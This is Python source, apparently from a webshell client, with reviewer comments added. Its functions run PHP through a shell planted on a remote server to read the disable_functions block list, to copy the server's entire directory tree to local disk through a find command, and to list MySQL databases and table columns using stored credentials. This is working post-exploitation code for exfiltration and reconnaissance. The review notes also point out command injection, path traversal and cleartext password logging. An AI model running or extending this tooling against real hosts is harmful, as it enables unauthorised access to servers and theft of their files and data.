def get_disabled_functions(self):
    """Log the PHP ``disable_functions`` setting read back from the remote host.

    A non-empty ``self.disabled_functions`` is treated as a cache: it is
    logged and no request is made. Otherwise the snippet
    ``echo ini_get('disable_functions');`` is handed to
    ``self.php_code_exec_token`` and the reply is indexed as
    ``(ok, output)``.

    ``disable_functions`` is the php.ini directive an administrator uses to
    block individual PHP functions, so the value logged here is the server's
    configured block list.

    Returns:
        None. The outcome is reported through ``Log`` and, on success, stored
        in ``self.disabled_functions``.
    """
    banner = "Disabled functions : \n%s"

    cached = self.disabled_functions
    if len(cached) > 0:
        Log.success(banner % list2string(cached, "\t[", "]\n"))
        return

    reply = self.php_code_exec_token("echo ini_get('disable_functions');")
    if not reply[0]:
        # On failure the second element is used as the error text.
        Log.error("Error occured! %s" % reply[1])
        return

    raw_value = reply[1]
    if raw_value == "":
        # An empty directive leaves the cache empty, so the next call asks again.
        Log.warning("No function disabled!")
        self.disabled_functions = []
        return

    # The slice discards the final element of the split, whatever it holds.
    # NOTE(review): presumably this strips the empty string left by a
    # trailing comma; confirm against the values actually returned.
    self.disabled_functions = raw_value.split(",")[:-1]
    Log.success(banner % list2string(self.disabled_functions, "\t[", "]\n"))
def download_advanced(self, path, args):
    """Copy a remote directory tree to local disk, one file at a time.

    The local destination of every directory and file is the string returned
    by ``get_domain(self.url)`` with the remote path appended to it.

    Args:
        path: Remote path passed to ``self.get_all_directories`` and used as
            the starting point of the remote ``find`` command.
        args: Extra text appended verbatim to the ``find`` command line.

    Returns:
        None. Progress and failures are reported through ``Log``.
    """
    local_root = get_domain(self.url)

    # Step 1: recreate the remote directory layout locally.
    remote_dirs = self.get_all_directories(path)
    Log.success("Directories : \n%s" % list2string(remote_dirs, "\t[", "]\n"))
    Log.info("Create directories locally...")
    for remote_dir in remote_dirs:
        # NOTE(review): plain string concatenation, no normalisation. The
        # suffix comes from the remote host, so a name containing ".."
        # would resolve outside local_root on the machine running this.
        local_dir = local_root + remote_dir
        Log.info("Creating : [%s]" % local_dir)
        try:
            os.makedirs(local_dir)
        except Exception as err:
            # Any failure (an already existing directory included) is
            # logged and the loop carries on.
            Log.error(str(err))

    # Step 2: list the remote files, then fetch each one.
    Log.info("Listing all files...")
    # NOTE(review): path and args are interpolated into the command line
    # without quoting; whitespace or shell metacharacters in either change
    # the command that is executed.
    listing = self.auto_exec("find %s %s" % (path, args))
    if not listing[0]:
        Log.error("Listing files error!")
        return

    Log.success("Listing files success!")
    # The output is split on newlines and the last element is dropped.
    for remote_file in listing[1].split("\n")[:-1]:
        # Same unnormalised concatenation as for the directories above.
        local_file = local_root + remote_file
        Log.info("Downloading %s to %s" % (remote_file, local_file))
        self.download_base(remote_file, local_file)
def get_databases(self):
    """Log the schema names reported by the configured MySQL server.

    A non-empty ``self.databases`` is logged as-is and no request is made.
    Otherwise a PHP snippet is built that connects with ``self.ip``,
    ``self.username`` and ``self.password``, selects ``schema_name`` from
    ``information_schema.schemata`` and echoes each name followed by a comma.
    The snippet is run through ``self.webshell.php_code_exec_token`` and the
    reply is indexed as ``(ok, output)``.

    Returns:
        None. On success the names are stored in ``self.databases``.
    """
    header = "Database : \n"

    known = self.databases
    if len(known) > 0:
        Log.success(header + list2string(known, "=> [", "]\n"))
        return

    # NOTE(review): the three values are placed inside single-quoted PHP
    # strings without escaping, so a quote or backslash in any of them
    # alters the generated code.
    template = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('information_schema');$s='select schema_name from information_schema.schemata';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();"
    code = template % (self.ip, self.username, self.password)

    # NOTE(review): the logged snippet contains self.password in clear text,
    # so the credential ends up wherever Log.info output is written or kept.
    Log.info("Executing : \n%s" % code)

    reply = self.webshell.php_code_exec_token(code)
    if not reply[0]:
        Log.error("Error occured!")
        return

    # Every name is echoed with a trailing comma, so the final element of
    # the split is dropped.
    names = reply[1].split(",")[:-1]
    self.databases = names
    Log.success(header + list2string(names, "=> [", "]\n"))
def get_columns_from_table(self, tablename, database):
    """Log the column names of one table as reported by the MySQL server.

    Builds a PHP snippet that connects with ``self.ip``, ``self.username``
    and ``self.password``, selects ``database`` and reads ``column_name``
    from ``information_schema.columns`` for rows whose ``table_name`` equals
    ``tablename``. The snippet is run through
    ``self.webshell.php_code_exec_token`` and the reply is indexed as
    ``(ok, output)``. Nothing is cached.

    Args:
        tablename: Table name inserted into the SQL ``where`` clause.
        database: Database name passed to ``select_db``.

    Returns:
        None. The column list or an error is reported through ``Log``.
    """
    # NOTE(review): all five values are spliced into the PHP/SQL text without
    # escaping; a quote character in any of them changes the statement that
    # is executed.
    template = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('%s');$s='select column_name from information_schema.columns where table_name = \"%s\"';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();"
    code = template % (
        self.ip,
        self.username,
        self.password,
        database,
        tablename,
    )

    # NOTE(review): the logged snippet contains self.password in clear text,
    # so the credential ends up wherever Log.info output is written or kept.
    Log.info("Executing : \n%s" % code)

    reply = self.webshell.php_code_exec_token(code)
    if not reply[0]:
        Log.error("Error occured!")
        return

    # Every name is echoed with a trailing comma, so the final element of
    # the split is dropped.
    column_names = reply[1].split(",")[:-1]
    Log.success("Columns : \n" + list2string(column_names, "=> [", "]\n"))